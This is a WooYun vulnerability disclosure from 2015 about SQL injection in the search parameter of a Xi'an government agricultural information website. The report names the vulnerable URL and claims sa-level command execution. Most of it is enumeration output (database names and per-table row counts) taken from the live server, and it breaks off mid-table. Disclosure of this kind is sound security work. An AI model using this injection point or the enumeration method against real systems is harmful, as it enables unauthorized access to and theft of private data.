当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106950

漏洞标题:西安农业信息网SQL注射导致大量信息泄露,sa权限可命令执行

相关厂商:西安农业信息网

漏洞作者: Yang

提交时间:2015-04-13 12:56

修复时间:2015-05-30 13:30

公开时间:2015-05-30 13:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-13: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经确认,细节仅向厂商公开
2015-04-25: 细节向核心白帽子及相关领域专家公开
2015-05-05: 细节向普通白帽子公开
2015-05-15: 细节向实习白帽子公开
2015-05-30: 细节向公众公开

简要描述:

信息超过百万吧
但是有没有用我就不知道了

详细说明:


1.png


http://www.xaagri.gov.cn/Search.aspx?type=0&key=

1.png


available databases [16]:
[*] master
[*] model
[*] msdb
[*] Nong
[*] Nong_20140519Bak
[*] nong_tt
[*] nongOld
[*] NongTest0712
[*] NONT_TEMP
[*] ReportServer
[*] ReportServerTempDB
[*] sitegroup
[*] sitegroup20111206
[*] temp
[*] tempdb
[*] WUKESOFT


看--count

Database: Nong
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.CNong_MarketPrice                            | 1042432 |
| dbo.CNong_EtpPublishInfo                         | 175576  |
| dbo.V_CNong_EtpPublishInfo                       | 175576  |
| dbo.view_QBXX                                    | 166221  |
| dbo.V_CS                                         | 158647  |
| dbo.VIEW_select                                  | 149514  |
| dbo.VIEW_qygy                                    | 144993  |
| dbo.view_Zhaopin                                 | 123582  |
| dbo.CNong_ProductInfo                            | 111262  |
| dbo.CNong_ProductType                            | 37194   |
| dbo.CNong_news                                   | 28817   |
| dbo.View_NewsCate                                | 28293   |
| dbo.CNong_log                                    | 21375   |
| dbo.hosturl                                      | 18764   |
| dbo.view_pmanager                                | 17888   |
| dbo.VIEW_HY_XX                                   | 17887   |
| dbo.view_UISelect                                | 16786   |
| dbo.VIEW_Price                                   | 16427   |
| dbo.View_GEGY                                    | 13654   |
| dbo.V_CSQ                                        | 5381    |
| dbo.CNong_EnterPriseAccount                      | 3832    |
| dbo.CNong_EnterPriseInfo                         | 3826    |
| dbo.GoodEtp_All                                  | 3824    |
| dbo.VIEW_CNong_EnterPriseAccount                 | 3824    |
| dbo.CNong_Question                               | 3667    |
| dbo.VIEW_GEQG                                    | 2996    |
| dbo.CNong_UserInfo                               | 2746    |
| dbo.VIEW_CNong_UserInfo                          | 2746    |
| dbo.VIEW_qyqg                                    | 2405    |
| dbo.VIEW_DL                                      | 2120    |
| dbo.CNong_EtpPoints                              | 1263    |
| dbo.CNong_EtpHits                                | 1184    |
| dbo.CNong_SearchKeyFX                            | 918     |
| dbo.View_GetAllSearchKey                         | 918     |
| dbo.CNong_EtpPublishInfo_BoHui                   | 528     |
| dbo.ARGQACONTENT                                 | 520     |
| dbo.CNong_MarketInfo                             | 496     |
| dbo.CNong_OrgInfo                                | 443     |
| dbo.ARGQAONLINE                                  | 407     |
| dbo.View_ARGQAONLINE                             | 343     |
| dbo.CNong_RoleForPage                            | 187     |
| dbo.CNong_EtpPubInfoType                         | 153     |
| dbo.CNong_DepartmentInfo                         | 132     |
| dbo.CNong_Authenticode                           | 123     |
| dbo.CNong_Sort                                   | 114     |
| dbo.CNong_PageConfig                             | 96      |
| dbo.CNnong_GuanGuang                             | 69      |
| dbo.CNong_ZiZhi                                  | 63      |
| dbo.pangolin_test_table                          | 58      |
| dbo.NetInfo                                      | 51      |
| dbo.CNong_ServiceProduct                         | 50      |
| dbo.CNong_AdminUser                              | 49      |
| dbo.CNong_NewsCata                               | 47      |
| dbo.view_CPZS                                    | 46      |
| dbo.View_productinfos                            | 46      |
| dbo.View_qycp                                    | 46      |
| dbo.CNong_UserForRole                            | 42      |
| dbo.CNong_Video                                  | 42      |
| dbo.CNong_NewsCata2                              | 31      |
| dbo.CNong_Links                                  | 25      |
| dbo.jiaozhu                                      | 21      |
| dbo.CNong_Consumedetail                          | 17      |
| dbo.CNong_Survey_Answers                         | 16      |
| dbo.CNong_TagCata                                | 14      |
| dbo.CNong_Operation                              | 13      |
| dbo.CNong_BankInfo                               | 12      |
| dbo.CNong_Img                                    | 11      |
| dbo.CNong_MsgState                               | 11      |
| dbo.CNong_SubjectCata                            | 11      |
| dbo.CNong_Consume                                | 10      |
| dbo.CNong_Survey_options                         | 10      |
| dbo.CNong_RoleInfo                               | 9       |
| dbo.PagerConfig                                  | 9       |
| dbo.ARGQA_Type                                   | 8       |
| dbo.CNong_KeyWord                                | 8       |
| dbo.CNong_EtpGQTypeInfo                          | 6       |
| dbo.CNong_Msg                                    | 6       |
| dbo.CNong_XJ                                     | 6       |
| dbo.CNong_Survey_Log                             | 5       |
| dbo.CNong_EnterPriseType                         | 4       |
| dbo.CNong_MarketPrice_FluctuateTypes             | 4       |
| dbo.CNong_Survey                                 | 4       |
| dbo.CNong_JzLeave                                | 3       |
| dbo.CNong_Video_Type                             | 3       |
| dbo.CNong_PriceIndicesShowSet                    | 2       |
| dbo.CNong_EtpChargeInfo                          | 1       |
| dbo.CNong_Level                                  | 1       |
| dbo.CNong_ShoppingCart                           | 1       |
+--------------------------------------------------+---------+
Database: nong_tt
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.CNong_ProductInfo                            | 111244  |
| dbo.CNong_MarketPrice                            | 59848   |
| dbo.CNong_ProductType                            | 37190   |
| dbo.hosturl                                      | 18764   |
| dbo.CNong_news                                   | 15087   |
| dbo.View_NewsCate                                | 15086   |
| dbo.VIEW_Price                                   | 7469    |
| dbo.CNong_log                                    | 5537    |
| dbo.CNong_Question                               | 2687    |
| dbo.CNong_EtpPublishInfo                         | 2258    |
| dbo.V_CNong_EtpPublishInfo                       | 2258    |
| dbo.CNong_EtpPoints                              | 1263    |
| dbo.CNong_EtpHits                                | 1184    |
| dbo.CNong_SearchKeyFX                            | 918     |
| dbo.View_GetAllSearchKey                         | 918     |
| dbo.CNong_MarketInfo                             | 496     |
| dbo.CNong_OrgInfo                                | 443     |
| dbo.CNong_UserInfo                               | 187     |
| dbo.VIEW_CNong_UserInfo                          | 187     |
| dbo.CNong_RoleForPage                            | 156     |
| dbo.CNong_EtpPubInfoType                         | 153     |
| dbo.ARGQACONTENT                                 | 150     |
| dbo.CNong_DepartmentInfo                         | 126     |
| dbo.view_pmanager                                | 113     |
| dbo.VIEW_HY_XX                                   | 111     |
| dbo.CNong_Sort                                   | 109     |
| dbo.CNong_PageConfig                             | 92      |
| dbo.CNong_ZiZhi                                  | 63      |
| dbo.CNong_NewsCata                               | 53      |
| dbo.NetInfo                                      | 51      |
| dbo.CNong_ServiceProduct                         | 50      |
| dbo.CNong_AdminUser                              | 42      |
| dbo.ARGQAONLINE                                  | 39      |
| dbo.CNong_UserForRole                            | 33      |
| dbo.CNong_NewsCata2                              | 31      |
| dbo.CNong_EnterPriseAccount                      | 29      |
| dbo.view_QBXX                                    | 29      |
| dbo.view_CPZS                                    | 28      |
| dbo.View_productinfos                            | 28      |
| dbo.View_qycp                                    | 28      |
| dbo.view_UISelect                                | 27      |
| dbo.CNong_Links                                  | 25      |
| dbo.V_CS                                         | 22      |
| dbo.CNong_EnterPriseInfo                         | 21      |
| dbo.GoodEtp_All                                  | 21      |
| dbo.VIEW_CNong_EnterPriseAccount                 | 21      |
| dbo.View_GEGY                                    | 20      |
| dbo.CNong_Video                                  | 19      |
| dbo.CNong_Img                                    | 18      |
| dbo.CNong_Consumedetail                          | 17      |
| dbo.CNong_Survey_Answers                         | 16      |
| dbo.CNong_TagCata                                | 14      |
| dbo.CNong_Operation                              | 13      |
| dbo.CNong_BankInfo                               | 12      |
| dbo.CNong_MsgState                               | 11      |
| dbo.CNong_Consume                                | 10      |
| dbo.CNong_RoleInfo                               | 10      |
| dbo.CNong_SubjectCata                            | 9       |
| dbo.PagerConfig                                  | 9       |
| dbo.ARGQA_Type                                   | 8       |
| dbo.CNong_KeyWord                                | 8       |
| dbo.View_ARGQAONLINE                             | 8       |
| dbo.CNong_EtpGQTypeInfo                          | 6       |
| dbo.CNong_Msg                                    | 6       |
| dbo.CNong_XJ                                     | 6       |
| dbo.V_CSQ                                        | 6       |
| dbo.VIEW_GEQG                                    | 6       |
| dbo.CNong_Survey_Log                             | 5       |
| dbo.CNong_EnterPriseType                         | 4       |
| dbo.CNong_Survey                                 | 4       |
| dbo.CNong_JzLeave                                | 3       |
| dbo.CNong_MarketPrice_FluctuateTypes             | 2       |
| dbo.CNong_PriceIndicesShowSet                    | 2       |
| dbo.CNong_Survey_options                         | 2       |
| dbo.VIEW_qygy                                    | 2       |
| dbo.VIEW_select                                  | 2       |
| dbo.view_Zhaopin                                 | 2       |
| dbo.CNong_EtpChargeInfo                          | 1       |
| dbo.CNong_Level                                  | 1       |
| dbo.CNong_ShoppingCart                           | 1       |
+--------------------------------------------------+---------+
Database: temp
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.price                                        | 73471   |
| dbo.nxt_syslog                                   | 23101   |
| dbo.ckp_WebStat                                  | 18327   |
| dbo.member                                       | 16565   |
| dbo.nxt_treebase_levels                          | 12680   |
| dbo.nxt_article_kind_access                      | 8528    |
| dbo.nxt_article_history                          | 6849    |
| dbo.db_js                                        | 6038    |
| dbo.nxt_article2                                 | 4177    |
| dbo.nxt_upload_file                              | 2550    |
| dbo.robber_news                                  | 1740    |
| dbo.nxt_treebase                                 | 1585    |
| dbo.nxt_zd                                       | 1489    |
| dbo.weather                                      | 1274    |
| dbo.db_zl                                        | 897     |
| dbo.refer_nz_info                                | 795     |
| dbo.nxt_article                                  | 571     |
| dbo.v_news                                       | 571     |
| dbo.refer_seed                                   | 522     |
| dbo.nxt_site_access                              | 410     |
| dbo.bbs_expert                                   | 398     |
| dbo.refer_zb_name                                | 304     |
| dbo.user_guest                                   | 278     |
| dbo.db_type                                      | 240     |
| dbo.nxt_article_kind                             | 208     |
| dbo.refer_zb_zwbh                                | 204     |
| dbo.refer_info                                   | 150     |
| dbo.db_fg                                        | 121     |
| dbo.refer_type                                   | 108     |
| dbo.nxt_box_levels                               | 104     |
| dbo.refer_pz                                     | 72      |
| dbo.link                                         | 71      |
| dbo.refer_zd                                     | 70      |
| dbo.mall_prod                                    | 67      |
| dbo.mall_prod_type                               | 64      |
| dbo.nxt_zhuanti                                  | 63      |
| dbo.nxt_admin_online                             | 58      |
| dbo.db_bz                                        | 57      |
| dbo.prod_type                                    | 55      |
| dbo.zj_bbs                                       | 54      |
| dbo.mall_shop_type                               | 53      |
| dbo.trade_type                                   | 53      |
| dbo.user_mail                                    | 53      |
| dbo.office_area                                  | 51      |
| dbo.robber_newsSite                              | 48      |
| dbo.robber_robberkind1                           | 45      |
| dbo.mall_info                                    | 44      |
| dbo.nxt_admin                                    | 41      |
| dbo.refer_seed_type                              | 32      |
| dbo.agrixm                                       | 31      |
| dbo.comp_type                                    | 30      |
| dbo.product                                      | 30      |
| dbo.db_zj                                        | 27      |
| dbo.invest                                       | 24      |
| dbo.company                                      | 23      |
| dbo.mall_shop                                    | 21      |
| dbo.nxt_model                                    | 20      |
| dbo.webconfig                                    | 19      |
| dbo.refer_nz_type                                | 17      |
| dbo.movie_type                                   | 16      |
| dbo.db_xm                                        | 15      |
| dbo.nxt_box                                      | 13      |
| dbo.job                                          | 10      |
| dbo.nxt_site                                     | 10      |
| dbo.nxt_adv                                      | 9       |
| dbo.nxt_levels                                   | 8       |
| dbo.office_article                               | 7       |
| dbo.db_sc                                        | 6       |
| dbo.office_admin                                 | 6       |
| dbo.db_lt                                        | 5       |
| dbo.prod_order                                   | 4       |
| dbo.db_jjr                                       | 3       |
| dbo.diaocha                                      | 3       |
| dbo.mall_order                                   | 3       |
| dbo.nxt_word_href                                | 3       |
| dbo.software                                     | 3       |
| dbo.user_jsgq                                    | 3       |
| dbo.db_mt                                        | 2       |
| dbo.mall_buy                                     | 2       |
| dbo.moviefile                                    | 2       |
| dbo.db_zz                                        | 1       |
| dbo.guestbook                                    | 1       |
| dbo.nxt_review                                   | 1       |
| dbo.office_mail                                  | 1       |
| dbo.soft_type                                    | 1       |
+--------------------------------------------------+---------+
Database: NongTest0712
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.CNong_MarketPrice                            | 369872  |
| dbo.CNong_EtpPublishInfo                         | 159117  |
| dbo.CNong_ProductInfo                            | 111240  |
| dbo.CNong_ProductType                            | 37192   |
| dbo.CNong_news                                   | 20578   |
| dbo.hosturl                                      | 18764   |
| dbo.CNong_log                                    | 13655   |
| dbo.CNong_EnterPriseAccount                      | 3822    |
| dbo.CNong_EnterPriseInfo                         | 3816    |
| dbo.CNong_Question                               | 2775    |
| dbo.CNong_UserInfo                               | 1363    |
| dbo.CNong_EtpPoints                              | 1263    |
| dbo.CNong_EtpHits                                | 1184    |
| dbo.CNong_SearchKeyFX                            | 918     |
| dbo.CNong_MarketInfo                             | 496     |
| dbo.CNong_OrgInfo                                | 443     |
| dbo.ARGQACONTENT                                 | 286     |
| dbo.CNong_RoleForPage                            | 189     |
| dbo.ARGQAONLINE                                  | 176     |
| dbo.CNong_EtpPubInfoType                         | 153     |
| dbo.CNong_DepartmentInfo                         | 131     |
| dbo.CNong_Sort                                   | 112     |
| dbo.CNong_PageConfig                             | 95      |
| dbo.CNong_ZiZhi                                  | 63      |
| dbo.NetInfo                                      | 51      |
| dbo.CNong_ServiceProduct                         | 50      |
| dbo.CNong_AdminUser                              | 47      |
| dbo.CNong_NewsCata                               | 47      |
| dbo.CNong_UserForRole                            | 42      |
| dbo.CNong_NewsCata2                              | 31      |
| dbo.CNong_Links                                  | 27      |
| dbo.CNong_Video                                  | 23      |
| dbo.CNong_Img                                    | 18      |
| dbo.CNong_Consumedetail                          | 17      |
| dbo.CNnong_GuanGuang                             | 16      |
| dbo.CNong_Survey_Answers                         | 16      |
| dbo.CNong_TagCata                                | 14      |
| dbo.CNong_Operation                              | 13      |
| dbo.CNong_BankInfo                               | 12      |
| dbo.CNong_MsgState                               | 11      |
| dbo.CNong_Consume                                | 10      |
| dbo.CNong_SubjectCata                            | 10      |
| dbo.CNong_Survey_options                         | 10      |
| dbo.CNong_RoleInfo                               | 9       |
| dbo.PagerConfig                                  | 9       |
| dbo.ARGQA_Type                                   | 8       |
| dbo.CNong_KeyWord                                | 8       |
| dbo.CNong_EtpGQTypeInfo                          | 6       |
| dbo.CNong_Msg                                    | 6       |
| dbo.CNong_XJ                                     | 6       |
| dbo.CNong_Survey_Log                             | 5       |
| dbo.CNong_EnterPriseType                         | 4       |
| dbo.CNong_Survey                                 | 4       |
| dbo.CNong_JzLeave                                | 3       |
| dbo.CNong_Video_Type                             | 3       |
| dbo.CNong_Authenticode                           | 2       |
| dbo.CNong_MarketPrice_FluctuateTypes             | 2       |
| dbo.CNong_PriceIndicesShowSet                    | 2       |
| dbo.CNong_EtpChargeInfo                          | 1       |
| dbo.CNong_Level                                  | 1       |
| dbo.CNong_ShoppingCart                           | 1       |
+--------------------------------------------------+---------+
Database: nongOld
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.price                                        | 71262   |
| dbo.nxt_syslog                                   | 22510   |
| dbo.ckp_WebStat                                  | 18309   |
| dbo.nxt_article                                  | 17492   |
| dbo.v_news                                       | 17492   |
| dbo.member                                       | 16301   |
| dbo.nxt_treebase_levels                          | 11095   |
| dbo.nxt_article_kind_access                      | 8112    |
| dbo.nxt_article_history                          | 6790    |
| dbo.db_js                                        | 6038    |
| dbo.nxt_article2                                 | 4177    |
| dbo.nxt_upload_file                              | 2505    |
| dbo.robber_news                                  | 1740    |
| dbo.nxt_treebase                                 | 1585    |
| dbo.nxt_zd                                       | 1472    |
| dbo.weather                                      | 1274    |
| dbo.db_zl                                        | 897     |
| dbo.refer_nz_info                                | 795     |
| dbo.refer_seed                                   | 522     |
| dbo.bbs_expert                                   | 395     |
| dbo.nxt_site_access                              | 390     |
| dbo.refer_zb_name                                | 304     |
| dbo.user_guest                                   | 278     |
| dbo.db_type                                      | 240     |
| dbo.nxt_article_kind                             | 208     |
| dbo.refer_zb_zwbh                                | 204     |
| dbo.refer_info                                   | 150     |
| dbo.db_fg                                        | 121     |
| dbo.refer_type                                   | 108     |
| dbo.nxt_box_levels                               | 91      |
| dbo.refer_pz                                     | 72      |
| dbo.link                                         | 71      |
| dbo.refer_zd                                     | 70      |
| dbo.mall_prod                                    | 67      |
| dbo.mall_prod_type                               | 64      |
| dbo.nxt_zhuanti                                  | 63      |
| dbo.db_bz                                        | 57      |
| dbo.nxt_admin_online                             | 56      |
| dbo.prod_type                                    | 55      |
| dbo.zj_bbs                                       | 54      |
| dbo.mall_shop_type                               | 53      |
| dbo.trade_type                                   | 53      |
| dbo.user_mail                                    | 53      |
| dbo.office_area                                  | 51      |
| dbo.robber_newsSite                              | 48      |
| dbo.robber_robberkind1                           | 45      |
| dbo.mall_info                                    | 44      |
| dbo.nxt_admin                                    | 39      |
| dbo.refer_seed_type                              | 32      |
| dbo.agrixm                                       | 31      |
| dbo.comp_type                                    | 30      |
| dbo.product                                      | 30      |
| dbo.db_zj                                        | 27      |
| dbo.invest                                       | 24      |
| dbo.company                                      | 23      |
| dbo.mall_shop                                    | 21      |
| dbo.nxt_model                                    | 20      |
| dbo.webconfig                                    | 19      |
| dbo.refer_nz_type                                | 17      |
| dbo.movie_type                                   | 16      |
| dbo.db_xm                                        | 15      |
| dbo.nxt_box                                      | 13      |
| dbo.job                                          | 10      |
| dbo.nxt_site                                     | 10      |
| dbo.nxt_adv                                      | 9       |
| dbo.nxt_levels                                   | 7       |
| dbo.office_article                               | 7       |
| dbo.db_sc                                        | 6       |
| dbo.office_admin                                 | 6       |
| dbo.db_lt                                        | 5       |
| dbo.prod_order                                   | 4       |
| dbo.db_jjr                                       | 3       |
| dbo.diaocha                                      | 3       |
| dbo.mall_order                                   | 3       |
| dbo.nxt_word_href                                | 3       |
| dbo.software                                     | 3       |
| dbo.user_jsgq                                    | 3       |
| dbo.db_mt                                        | 2       |
| dbo.mall_buy                                     | 2       |
| dbo.moviefile                                    | 2       |
| dbo.db_zz                                        | 1       |
| dbo.guestbook                                    | 1       |
| dbo.nxt_review                                   | 1       |
| dbo.office_mail                                  | 1       |
| dbo.soft_type                                    | 1       |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.MSdbms_datatype_mapping                      | 387     |
| dbo.sysdatatypemappings                          | 387     |
| dbo.backupfile                                   | 328     |
| dbo.MSdbms_map                                   | 299     |
| dbo.MSdatatype_mappings                          | 215     |
| dbo.backupfilegroup                              | 164     |
| dbo.backupset                                    | 164     |
| dbo.MSdbms_datatype                              | 159     |
| dbo.backupmediafamily                            | 145     |
| dbo.backupmediaset                               | 145     |
| dbo.syspolicy_facet_events                       | 84      |
| dbo.syspolicy_management_facets                  | 74      |
| dbo.syscategories                                | 21      |
| dbo.restorefile                                  | 20      |
| dbo.syssubsystems                                | 12      |
| dbo.restorefilegroup                             | 10      |
| dbo.restorehistory                               | 10      |
| dbo.sysschedules                                 | 8       |
| dbo.sysschedules_localserver_view                | 8       |
| dbo.sysssispackages                              | 8       |
| dbo.MSdbms                                       | 7       |
| dbo.sysmail_configuration                        | 7       |
| dbo.syscollector_collection_items                | 5       |
| dbo.syscollector_collection_items_internal       | 5       |
| dbo.syscollector_config_store                    | 5       |
| dbo.syscollector_config_store_internal           | 5       |
| dbo.sysmanagement_shared_server_groups           | 5       |
| dbo.sysmanagement_shared_server_groups_internal  | 5       |
| dbo.syscollector_collector_types                 | 4       |
| dbo.syscollector_collector_types_internal        | 4       |
| dbo.syspolicy_configuration                      | 4       |
| dbo.syspolicy_configuration_internal             | 4       |
| dbo.sysssispackagefolders                        | 4       |
| dbo.syscollector_collection_sets                 | 3       |
| dbo.syscollector_collection_sets_internal        | 3       |
| dbo.sysdtscategories                             | 3       |
| dbo.sysjobsteps                                  | 3       |
| dbo.sysdbmaintplans                              | 1       |
| dbo.sysjobs                                      | 1       |
| dbo.sysjobs_view                                 | 1       |
| dbo.sysjobschedules                              | 1       |
| dbo.sysjobservers                                | 1       |
| dbo.sysmail_servertype                           | 1       |
| dbo.sysoriginatingservers_view                   | 1       |
| dbo.syssessions                                  | 1       |
| dbo.systargetservers_view                        | 1       |
+--------------------------------------------------+---------+
Database: ReportServer
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.ConfigurationInfo                            | 20      |
| dbo.Roles                                        | 8       |
| dbo.PolicyUserRole                               | 4       |
| dbo.Users                                        | 3       |
| dbo.Keys                                         | 2       |
| dbo.Policies                                     | 2       |
| dbo.SecData                                      | 2       |
| dbo.Catalog                                      | 1       |
| dbo.UpgradeInfo                                  | 1       |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.dm_os_buffer_descriptors                     | 98937   |
| sys.messages                                     | 97526   |
| sys.sysmessages                                  | 97526   |
| sys.dm_os_memory_objects                         | 22559   |
| sys.fulltext_system_stopwords                    | 15829   |
| sys.syscolumns                                   | 12564   |
| sys.dm_os_memory_cache_entries                   | 10702   |
| sys.syscacheobjects                              | 8909    |
| sys.dm_exec_cached_plans                         | 8514    |
| sys.all_parameters                               | 7088    |
| sys.system_parameters                            | 7088    |
| sys.dm_exec_query_stats                          | 6876    |
| sys.trace_subclass_values                        | 5366    |
| sys.all_columns                                  | 5270    |
| sys.dm_os_ring_buffers                           | 4804    |
| sys.system_columns                               | 4611    |
| sys.trace_event_bindings                         | 4304    |
| sys.dm_os_virtual_address_dump                   | 3299    |
| sys.syscomments                                  | 2993    |
| sys.dm_xe_object_columns                         | 2625    |
| dbo.spt_values                                   | 2506    |
| sys.all_objects                                  | 1999    |
| sys.sysobjects                                   | 1999    |
| sys.system_objects                               | 1925    |
| sys.database_permissions                         | 1851    |
| sys.syspermissions                               | 1850    |
| sys.sysprotects                                  | 1845    |
| sys.all_sql_modules                              | 1783    |
| sys.system_sql_modules                           | 1781    |
| sys.dm_xe_map_values                             | 1694    |
| sys.dm_os_performance_counters                   | 1167    |
| sys.sysperfinfo                                  | 1167    |
| sys.system_internals_partition_columns           | 822     |
| sys.columns                                      | 659     |
| sys.dm_xe_objects                                | 534     |
| sys.dm_db_index_usage_stats                      | 506     |
| sys.dm_os_wait_stats                             | 484     |
| sys.dm_audit_actions                             | 454     |
| sys.spatial_reference_systems                    | 390     |
| sys.dm_exec_query_transformation_stats           | 377     |
| sys.event_notification_event_types               | 364     |
| sys.all_views                                    | 354     |
| sys.system_views                                 | 354     |
| sys.stats_columns                                | 353     |
| sys.dm_os_memory_cache_clock_hands               | 276     |
| sys.index_columns                                | 271     |
| sys.sysindexkeys                                 | 271     |
| sys.trigger_event_types                          | 244     |
| sys.dm_os_memory_clerks                          | 217     |
| sys.sysindexes                                   | 203     |
| sys.stats                                        | 195     |
| sys.trace_events                                 | 180     |
| sys.dm_os_spinlock_stats                         | 171     |
| sys.dm_os_latch_stats                            | 145     |
| sys.allocation_units                             | 128     |
| sys.system_internals_allocation_units            | 128     |
| sys.dm_db_partition_stats                        | 116     |
| sys.indexes                                      | 116     |
| sys.partitions                                   | 116     |
| sys.system_internals_partitions                  | 116     |
| sys.dm_os_memory_cache_counters                  | 115     |
| sys.syscharsets                                  | 114     |
| sys.xml_schema_facets                            | 112     |
| sys.dm_db_missing_index_details                  | 110     |
| sys.dm_db_missing_index_group_stats              | 110     |
| sys.dm_db_missing_index_groups                   | 110     |
| sys.xml_schema_components                        | 99      |
| sys.system_components_surface_area_configuration | 93      |
| sys.dm_os_threads                                | 83      |
| sys.dm_audit_class_type_map                      | 82      |
| sys.xml_schema_types                             | 82      |
| sys.dm_os_worker_local_storage                   | 79      |
| sys.dm_os_workers                                | 79      |
| sys.dm_os_loaded_modules                         | 77      |
| sys.objects                                      | 74      |
| sys.trace_columns                                | 66      |
| sys.configurations                               | 65      |
| sys.sysconfigures                                | 65      |
| sys.syscurconfigs                                | 65      |
| sys.dm_db_session_space_usage                    | 61      |
| sys.dm_db_task_space_usage                       | 61      |
| sys.dm_exec_sessions                             | 61      |
| sys.sysprocesses                                 | 61      |
| sys.dm_os_memory_cache_hash_tables               | 52      |
| INFORMATION_SCHEMA.COLUMNS                       | 50      |
| sys.fulltext_document_types                      | 50      |
| sys.dm_os_memory_pools                           | 48      |
| sys.fulltext_languages                           | 48      |
| sys.dm_tran_locks                                | 42      |
| sys.syslockinfo                                  | 42      |
| sys.dm_exec_query_optimizer_info                 | 39      |
| sys.dm_exec_connections                          | 38      |
| sys.sysaltfiles                                  | 34      |
| sys.systypes                                     | 34      |
| sys.types                                        | 34      |
| sys.syslanguages                                 | 33      |
| sys.dm_os_tasks                                  | 32      |
| sys.master_files                                 | 32      |
| sys.server_permissions                           | 26      |
| sys.server_principals                            | 25      |
| sys.dm_exec_requests                             | 24      |
| sys.securable_classes                            | 22      |
| sys.trace_categories                             | 21      |
| sys.database_principals                          | 19      |
| sys.sysusers                                     | 19      |
| sys.xml_schema_component_placements              | 18      |
| sys.database_mirroring                           | 16      |
| sys.database_recovery_status                     | 16      |
| sys.databases                                    | 16      |
| sys.dm_exec_procedure_stats                      | 16      |
| sys.sysdatabases                                 | 16      |
| sys.syslogins                                    | 16      |
| INFORMATION_SCHEMA.SCHEMATA                      | 15      |
| sys.dm_os_stacks                                 | 15      |
| sys.schemas                                      | 15      |
| sys.xml_schema_attributes                        | 15      |
| sys.dm_os_waiting_tasks                          | 14      |
| sys.service_message_types                        | 14      |
| sys.dm_db_script_level                           | 11      |
| sys.dm_os_schedulers                             | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.dm_xe_session_event_actions                  | 10      |
| sys.server_event_session_actions                 | 10      |
| sys.crypt_properties                             | 8       |
| sys.server_role_members                          | 8       |
| sys.dm_tran_active_transactions                  | 7       |
| sys.dm_tran_database_transactions                | 7       |
| INFORMATION_SCHEMA.TABLES                        | 6       |
| sys.certificates                                 | 6       |
| sys.dm_os_memory_node_access_stats               | 6       |
| sys.service_contracts                            | 6       |
| sys.sql_logins                                   | 6       |
| sys.tables                                       | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| sys.dm_xe_session_events                         | 5       |
| sys.endpoints                                    | 5       |
| sys.server_event_session_events                  | 5       |
| sys.dm_xe_packages                               | 4       |
| sys.internal_tables                              | 4       |
| dbo.MSreplication_options                        | 3       |
| sys.assembly_types                               | 3       |
| sys.dm_broker_queue_monitors                     | 3       |
| sys.dm_clr_properties                            | 3       |
| sys.dm_os_hosts                                  | 3       |
| sys.dm_os_memory_brokers                         | 3       |
| sys.dm_xe_session_object_columns                 | 3       |
| sys.identity_columns                             | 3       |
| sys.login_token                                  | 3       |
| sys.service_queue_usages                         | 3       |
| sys.service_queues                               | 3       |
| sys.services                                     | 3       |
| sys.type_assembly_usages                         | 3       |
| sys.xml_schema_namespaces                        | 3       |
| INFORMATION_SCHEMA.ROUTINES                      | 2       |
| sys.database_files                               | 2       |
| sys.database_role_members                        | 2       |
| sys.dm_exec_query_resource_semaphores            | 2       |
| sys.dm_fts_memory_pools                          | 2       |
| sys.dm_os_memory_nodes                           | 2       |
| sys.dm_os_nodes                                  | 2       |
| sys.key_encryptions                              | 2       |
| sys.procedures                                   | 2       |
| sys.resource_governor_resource_pools             | 2       |
| sys.resource_governor_workload_groups            | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_modules                                  | 2       |
| sys.sysfiles                                     | 2       |
| sys.sysmembers                                   | 2       |
| sys.tcp_endpoints                                | 2       |
| dbo.spt_monitor                                  | 1       |
| sys.assemblies                                   | 1       |
| sys.assembly_files                               | 1       |
| sys.data_spaces                                  | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_db_file_space_usage                       | 1       |
| sys.dm_exec_background_job_queue_stats           | 1       |
| sys.dm_fts_fdhosts                               | 1       |
| sys.dm_os_dispatcher_pools                       | 1       |
| sys.dm_os_dispatchers                            | 1       |
| sys.dm_os_process_memory                         | 1       |
| sys.dm_os_sys_info                               | 1       |
| sys.dm_os_sys_memory                             | 1       |
| sys.dm_resource_governor_configuration           | 1       |
| sys.dm_resource_governor_resource_pools          | 1       |
| sys.dm_resource_governor_workload_groups         | 1       |
| sys.dm_tran_current_transaction                  | 1       |
| sys.dm_xe_session_targets                        | 1       |
| sys.dm_xe_sessions                               | 1       |
| sys.filegroups                                   | 1       |
| sys.linked_logins                                | 1       |
| sys.resource_governor_configuration              | 1       |
| sys.routes                                       | 1       |
| sys.server_event_session_fields                  | 1       |
| sys.server_event_session_targets                 | 1       |
| sys.server_event_sessions                        | 1       |
| sys.servers                                      | 1       |
| sys.symmetric_keys                               | 1       |
| sys.sysconstraints                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysoledbusers                                | 1       |
| sys.sysservers                                   | 1       |
| sys.traces                                       | 1       |
| sys.user_token                                   | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+
Database: sitegroup20111206
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.P_Product                                    | 8677    |
